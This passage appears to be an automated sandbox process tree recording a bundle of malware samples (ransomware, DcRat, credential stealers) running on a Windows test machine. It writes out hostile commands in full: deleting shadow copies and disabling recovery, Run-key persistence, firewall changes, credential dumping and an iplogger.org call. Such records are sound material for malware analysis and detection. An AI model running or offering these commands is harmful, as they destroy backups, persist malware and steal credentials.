                                                                                                  PID:5168
                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    21⤵
                                                                                                      PID:6644
                                                                                                    • C:\Windows\system32\chcp.com
                                                                                                      chcp 65001
                                                                                                      21⤵
                                                                                                        PID:6768
                                                                                                      • C:\Windows\system32\w32tm.exe
                                                                                                        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                        21⤵
                                                                                                          PID:6416
                                                                                                        • C:\Windows\Fonts\OfficeClickToRun.exe
                                                                                                          "C:\Windows\Fonts\OfficeClickToRun.exe"
                                                                                                          21⤵
                                                                                                          • Modifies registry class
                                                                                                          PID:5684
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\hv8MUNDtDA.bat"
                                                                                                            22⤵
                                                                                                              PID:4936
                                                                                                              • C:\Windows\system32\chcp.com
                                                                                                                chcp 65001
                                                                                                                23⤵
                                                                                                                  PID:3280
                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                  ping -n 10 localhost
                                                                                                                  23⤵
                                                                                                                  • Runs ping.exe
                                                                                                                  PID:3548
                                                                                                                • C:\Windows\Fonts\OfficeClickToRun.exe
                                                                                                                  "C:\Windows\Fonts\OfficeClickToRun.exe"
                                                                                                                  23⤵
                                                                                                                  • Modifies registry class
                                                                                                                  PID:3640
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\FxfZ91HAHt.bat"
                                                                                                                    24⤵
                                                                                                                      PID:6524
                                                                                                                      • C:\Windows\system32\chcp.com
                                                                                                                        chcp 65001
                                                                                                                        25⤵
                                                                                                                          PID:3576
                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                          ping -n 10 localhost
                                                                                                                          25⤵
                                                                                                                          • Runs ping.exe
                                                                                                                          PID:5696
                                                                                                                        • C:\Windows\Fonts\OfficeClickToRun.exe
                                                                                                                          "C:\Windows\Fonts\OfficeClickToRun.exe"
                                                                                                                          25⤵
                                                                                                                          • Modifies registry class
                                                                                                                          PID:2712
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\HGbZHomwPb.bat"
                                                                                                                            26⤵
                                                                                                                              PID:1244
                                                                                                                              • C:\Windows\system32\chcp.com
                                                                                                                                chcp 65001
                                                                                                                                27⤵
                                                                                                                                  PID:2376
                                                                                                                                • C:\Windows\system32\w32tm.exe
                                                                                                                                  w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                                  27⤵
                                                                                                                                    PID:5568
                                                                                                                                  • C:\Windows\Fonts\OfficeClickToRun.exe
                                                                                                                                    "C:\Windows\Fonts\OfficeClickToRun.exe"
                                                                                                                                    27⤵
                                                                                                                                    • Modifies registry class
                                                                                                                                    PID:1952
                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ZAbXgo5nXx.bat"
                                                                                                                                      28⤵
                                                                                                                                        PID:4012
                                                                                                                                        • C:\Windows\system32\chcp.com
                                                                                                                                          chcp 65001
                                                                                                                                          29⤵
                                                                                                                                            PID:5472
                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                            ping -n 10 localhost
                                                                                                                                            29⤵
                                                                                                                                            • Runs ping.exe
                                                                                                                                            PID:6112
                                                                                                                                          • C:\Windows\Fonts\OfficeClickToRun.exe
                                                                                                                                            "C:\Windows\Fonts\OfficeClickToRun.exe"
                                                                                                                                            29⤵
                                                                                                                                            • Modifies registry class
                                                                                                                                            PID:5640
                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ZFxA7ALGfV.bat"
                                                                                                                                              30⤵
                                                                                                                                                PID:5128
                                                                                                                                                • C:\Windows\system32\chcp.com
                                                                                                                                                  chcp 65001
                                                                                                                                                  31⤵
                                                                                                                                                    PID:6996
                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                    ping -n 10 localhost
                                                                                                                                                    31⤵
                                                                                                                                                    • Runs ping.exe
                                                                                                                                                    PID:1148
                                                                                                                                                  • C:\Windows\Fonts\OfficeClickToRun.exe
                                                                                                                                                    "C:\Windows\Fonts\OfficeClickToRun.exe"
                                                                                                                                                    31⤵
                                                                                                                                                    • Modifies registry class
                                                                                                                                                    PID:2328
                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\oyk3mdJSzu.bat"
                                                                                                                                                      32⤵
                                                                                                                                                        PID:3092
                                                                                                                                                        • C:\Windows\system32\chcp.com
                                                                                                                                                          chcp 65001
                                                                                                                                                          33⤵
                                                                                                                                                            PID:372
                                                                                                                                                          • C:\Windows\system32\w32tm.exe
                                                                                                                                                            w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                                                            33⤵
                                                                                                                                                              PID:6340
                                                                                                                                                            • C:\Windows\Fonts\OfficeClickToRun.exe
                                                                                                                                                              "C:\Windows\Fonts\OfficeClickToRun.exe"
                                                                                                                                                              33⤵
                                                                                                                                                              • Modifies registry class
                                                                                                                                                              PID:1540
                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\uzBRNhnnhO.bat"
                                                                                                                                                                34⤵
                                                                                                                                                                  PID:1628
                                                                                                                                                                  • C:\Windows\system32\chcp.com
                                                                                                                                                                    chcp 65001
                                                                                                                                                                    35⤵
                                                                                                                                                                      PID:7072
                                                                                                                                                                    • C:\Windows\system32\w32tm.exe
                                                                                                                                                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                                                                      35⤵
                                                                                                                                                                        PID:2532
                                                                                                        • C:\Windows\svchost.com
                                                                                                          "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\DOLZKQ~1.EXE"
                                                                                                          4⤵
                                                                                                            PID:6580
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\DOLZKQ~1.EXE
                                                                                                              C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\DOLZKQ~1.EXE
                                                                                                              5⤵
                                                                                                                PID:1808
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe
                                                                                                            "bot.exe"
                                                                                                            3⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Modifies system executable filetype association
                                                                                                            • Drops file in Program Files directory
                                                                                                            • Modifies registry class
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:5044
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe"
                                                                                                              4⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Adds Run key to start application
                                                                                                              • Drops autorun.inf file
                                                                                                              • Modifies registry class
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:3288
                                                                                                              • C:\Windows\svchost.com
                                                                                                                "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\TEMPEX~1.EXE"
                                                                                                                5⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Drops file in Windows directory
                                                                                                                PID:4144
                                                                                                                • C:\Users\Admin\AppData\Local\TEMPEX~1.EXE
                                                                                                                  C:\Users\Admin\AppData\Local\TEMPEX~1.EXE
                                                                                                                  6⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Modifies registry class
                                                                                                                  PID:1044
                                                                                                                  • C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe
                                                                                                                    C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe
                                                                                                                    7⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:1028
                                                                                                                    • C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe
                                                                                                                      C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe
                                                                                                                      8⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:4928
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 320
                                                                                                                        9⤵
                                                                                                                        • Program crash
                                                                                                                        PID:844
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 324
                                                                                                                      8⤵
                                                                                                                      • Program crash
                                                                                                                      PID:5308
                                                                                                                  • C:\Windows\svchost.com
                                                                                                                    "C:\Windows\svchost.com" "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\8349.tmp\splitterrypted.vbs
                                                                                                                    7⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Drops file in Windows directory
                                                                                                                    PID:5124
                                                                                                                    • C:\Windows\SysWOW64\wscript.exe
                                                                                                                      C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Local\Temp\8349.tmp\splitterrypted.vbs
                                                                                                                      8⤵
                                                                                                                        PID:6068
                                                                                                                • C:\Windows\svchost.com
                                                                                                                  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\TEMPSP~1.EXE"
                                                                                                                  5⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Drops file in Windows directory
                                                                                                                  PID:1220
                                                                                                                  • C:\Users\Admin\AppData\Local\TEMPSP~1.EXE
                                                                                                                    C:\Users\Admin\AppData\Local\TEMPSP~1.EXE
                                                                                                                    6⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Modifies registry class
                                                                                                                    PID:4488
                                                                                                                    • C:\Windows\svchost.com
                                                                                                                      "C:\Windows\svchost.com" "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\8637.tmp\spwak.vbs
                                                                                                                      7⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Drops file in Windows directory
                                                                                                                      PID:5212
                                                                                                                      • C:\Windows\SysWOW64\wscript.exe
                                                                                                                        C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Local\Temp\8637.tmp\spwak.vbs
                                                                                                                        8⤵
                                                                                                                          PID:5556
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
                                                                                                                3⤵
                                                                                                                • Drops startup file
                                                                                                                • Executes dropped EXE
                                                                                                                • Enumerates connected drives
                                                                                                                • Drops file in System32 directory
                                                                                                                • Sets desktop wallpaper using registry
                                                                                                                • Drops file in Program Files directory
                                                                                                                • Drops file in Windows directory
                                                                                                                • Modifies registry class
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:4792
                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                  C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
                                                                                                                  4⤵
                                                                                                                  • Modifies Windows Firewall
                                                                                                                  PID:3424
                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                  C:\Windows\system32\netsh.exe advfirewall reset
                                                                                                                  4⤵
                                                                                                                  • Modifies Windows Firewall
                                                                                                                  PID:2560
                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___CF43TMQ2_.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                                                                                                  4⤵
                                                                                                                    PID:3316
                                                                                                                  • C:\Windows\SysWOW64\NOTEPAD.EXE
                                                                                                                    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___K7KNZ_.txt
                                                                                                                    4⤵
                                                                                                                    • Opens file in notepad (likely ransom note)
                                                                                                                    PID:5392
                                                                                                                  • C:\Windows\svchost.com
                                                                                                                    "C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /d /c taskkill /f /im "E" > NUL & ping -n 1 127.0.0.1 > NUL & del "C" > NUL && exit
                                                                                                                    4⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Drops file in Windows directory
                                                                                                                    PID:1628
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /d /c taskkill /f /im E > NUL & ping -n 1 127.0.0.1 > NUL & del C > NUL && exit
                                                                                                                      5⤵
                                                                                                                        PID:2176
                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                          taskkill /f /im E
                                                                                                                          6⤵
                                                                                                                          • Kills process with taskkill
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:5284
                                                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                                                          ping -n 1 127.0.0.1
                                                                                                                          6⤵
                                                                                                                          • Runs ping.exe
                                                                                                                          PID:5436
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
                                                                                                                    3⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Adds Run key to start application
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:396
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
                                                                                                                    3⤵
                                                                                                                    • Drops startup file
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Sets desktop wallpaper using registry
                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                    PID:5072
                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                      attrib +h .
                                                                                                                      4⤵
                                                                                                                      • DcRat
                                                                                                                      • Views/modifies file attributes
                                                                                                                      PID:2176
                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                      icacls . /grant Everyone:F /T /C /Q
                                                                                                                      4⤵
                                                                                                                      • Modifies file permissions
                                                                                                                      PID:928
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
                                                                                                                      taskdl.exe
                                                                                                                      4⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:2608
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c 204081713278387.bat
                                                                                                                      4⤵
                                                                                                                        PID:4100
                                                                                                                        • C:\Windows\SysWOW64\cscript.exe
                                                                                                                          cscript.exe //nologo m.vbs
                                                                                                                          5⤵
                                                                                                                            PID:2232
                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                          attrib +h +s F:\$RECYCLE
                                                                                                                          4⤵
                                                                                                                          • Views/modifies file attributes
                                                                                                                          PID:3540
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
                                                                                                                          taskdl.exe
                                                                                                                          4⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:5444
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          cmd.exe /c start /b @[email protected] vs
                                                                                                                          4⤵
                                                                                                                            PID:6112
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
                                                                                                                              5⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                              PID:5368
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                                                                                                                                6⤵
                                                                                                                                  PID:3452
                                                                                                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                    wmic shadowcopy delete
                                                                                                                                    7⤵
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:264
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
                                                                                                                              taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
                                                                                                                              4⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:3828
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
                                                                                                                              4⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Sets desktop wallpaper using registry
                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                              PID:2464
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "fjjdtrspmwf051" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\RarSFX0\tasksche.exe\"" /f
                                                                                                                              4⤵
                                                                                                                                PID:1596
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "fjjdtrspmwf051" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\RarSFX0\tasksche.exe\"" /f
                                                                                                                                  5⤵
                                                                                                                                  • Adds Run key to start application
                                                                                                                                  • Modifies registry key
                                                                                                                                  PID:2428
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
                                                                                                                                taskdl.exe
                                                                                                                                4⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:2448
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
                                                                                                                                taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
                                                                                                                                4⤵
                                                                                                                                  PID:5972
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
                                                                                                                                  taskdl.exe
                                                                                                                                  4⤵
                                                                                                                                    PID:6296
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
                                                                                                                                    taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
                                                                                                                                    4⤵
                                                                                                                                      PID:6672
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
                                                                                                                                      taskdl.exe
                                                                                                                                      4⤵
                                                                                                                                        PID:6348
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
                                                                                                                                        taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
                                                                                                                                        4⤵
                                                                                                                                          PID:6016
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
                                                                                                                                          taskdl.exe
                                                                                                                                          4⤵
                                                                                                                                            PID:1920
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
                                                                                                                                            taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
                                                                                                                                            4⤵
                                                                                                                                              PID:4852
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
                                                                                                                                              taskdl.exe
                                                                                                                                              4⤵
                                                                                                                                                PID:3680
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
                                                                                                                                                taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
                                                                                                                                                4⤵
                                                                                                                                                  PID:6120
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
                                                                                                                                                  taskdl.exe
                                                                                                                                                  4⤵
                                                                                                                                                    PID:4260
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
                                                                                                                                                    taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
                                                                                                                                                    4⤵
                                                                                                                                                      PID:5336
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
                                                                                                                                                      taskdl.exe
                                                                                                                                                      4⤵
                                                                                                                                                        PID:5536
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe
                                                                                                                                                      "RIP_YOUR_PC_LOL.exe"
                                                                                                                                                      3⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Modifies registry class
                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                      PID:4360
                                                                                                                                                      • C:\Users\Admin\Desktop\1.exe
                                                                                                                                                        "C:\Users\Admin\Desktop\1.exe"
                                                                                                                                                        4⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                        PID:2460
                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                          "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5F27.tmp\5F28.tmp\5F29.bat C:\Users\Admin\Desktop\1.exe"
                                                                                                                                                          5⤵
                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                          PID:3328
                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/2bB2s6
                                                                                                                                                            6⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                            • Modifies registry class
                                                                                                                                                            PID:2236
                                                                                                                                                            • C:\Windows\svchost.com
                                                                                                                                                              "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe" --single-argument https://iplogger.org/2bB2s6
                                                                                                                                                              7⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                              PID:760
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe --single-argument https://iplogger.org/2bB2s6
                                                                                                                                                                8⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:5036
                                                                                                                                                      • C:\Users\Admin\Desktop\10.exe
                                                                                                                                                        "C:\Users\Admin\Desktop\10.exe"
                                                                                                                                                        4⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:4180
                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                          attrib +h .
                                                                                                                                                          5⤵
                                                                                                                                                          • Views/modifies file attributes
                                                                                                                                                          PID:3636
                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                          icacls . /grant Everyone:F /T /C /Q
                                                                                                                                                          5⤵
                                                                                                                                                          • Modifies file permissions
                                                                                                                                                          PID:1596
                                                                                                                                                      • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
                                                                                                                                                        "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\2.doc" /o ""
                                                                                                                                                        4⤵
                                                                                                                                                          PID:776
                                                                                                                                                        • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
                                                                                                                                                          "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Desktop\3.xlsx"
                                                                                                                                                          4⤵
                                                                                                                                                            PID:884
                                                                                                                                                          • C:\Users\Admin\Desktop\5.exe
                                                                                                                                                            "C:\Users\Admin\Desktop\5.exe"
                                                                                                                                                            4⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Modifies registry class
                                                                                                                                                            PID:3144
                                                                                                                                                            • C:\Windows\svchost.com
                                                                                                                                                              "C:\Windows\svchost.com" "C:\PROGRA~3\system.exe"
                                                                                                                                                              5⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                              PID:5224
                                                                                                                                                              • C:\PROGRA~3\system.exe
                                                                                                                                                                C:\PROGRA~3\system.exe
                                                                                                                                                                6⤵
                                                                                                                                                                • Drops startup file
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                PID:5348
                                                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                  netsh firewall add allowedprogram "C:\ProgramData\system.exe" "system.exe" ENABLE
                                                                                                                                                                  7⤵
                                                                                                                                                                  • Modifies Windows Firewall
                                                                                                                                                                  PID:5520
                                                                                                                                                          • C:\Users\Admin\Desktop\6.exe
                                                                                                                                                            "C:\Users\Admin\Desktop\6.exe"
                                                                                                                                                            4⤵
                                                                                                                                                            • UAC bypass
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                            • System policy modification
                                                                                                                                                            PID:1392
                                                                                                                                                            • C:\Users\Admin\Desktop\6.exe
                                                                                                                                                              "C:\Users\Admin\Desktop\6.exe"
                                                                                                                                                              5⤵
                                                                                                                                                              • UAC bypass
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              • System policy modification
                                                                                                                                                              PID:5872
                                                                                                                                                              • C:\Windows\System32\msscntrs\lsass.exe
                                                                                                                                                                "C:\Windows\System32\msscntrs\lsass.exe"
                                                                                                                                                                6⤵
                                                                                                                                                                • UAC bypass
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                • System policy modification
                                                                                                                                                                PID:2736
                                                                                                                                                          • C:\Users\Admin\Desktop\7.exe
                                                                                                                                                            "C:\Users\Admin\Desktop\7.exe"
                                                                                                                                                            4⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                            PID:384
                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                              C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
                                                                                                                                                              5⤵
                                                                                                                                                              • Accesses Microsoft Outlook accounts
                                                                                                                                                              PID:1044
                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                              C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
                                                                                                                                                              5⤵
                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                              PID:3976
                                                                                                                                                          • C:\Users\Admin\Desktop\8.exe
                                                                                                                                                            "C:\Users\Admin\Desktop\8.exe"
                                                                                                                                                            4⤵
                                                                                                                                                            • Drops startup file
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Sets desktop wallpaper using registry
                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                            PID:2892
                                                                                                                                                            • C:\Windows\system32\wbem\wmic.exe
                                                                                                                                                              "C:\l\d\..\..\Windows\qbn\jgv\x\..\..\..\system32\hvp\..\wbem\lwph\p\..\..\wmic.exe" shadowcopy delete
                                                                                                                                                              5⤵
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:5808
                                                                                                                                                          • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
                                                                                                                                                            "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\9.docm" /o ""
                                                                                                                                                            4⤵
                                                                                                                                                              PID:2268
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe
                                                                                                                                                            "ska2pwej.aeh.exe"
                                                                                                                                                            3⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                            PID:2364
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-A3G13.tmp\ska2pwej.aeh.tmp
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-A3G13.tmp\ska2pwej.aeh.tmp" /SL5="$701E4,4511977,830464,C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe"
                                                                                                                                                              4⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:1676
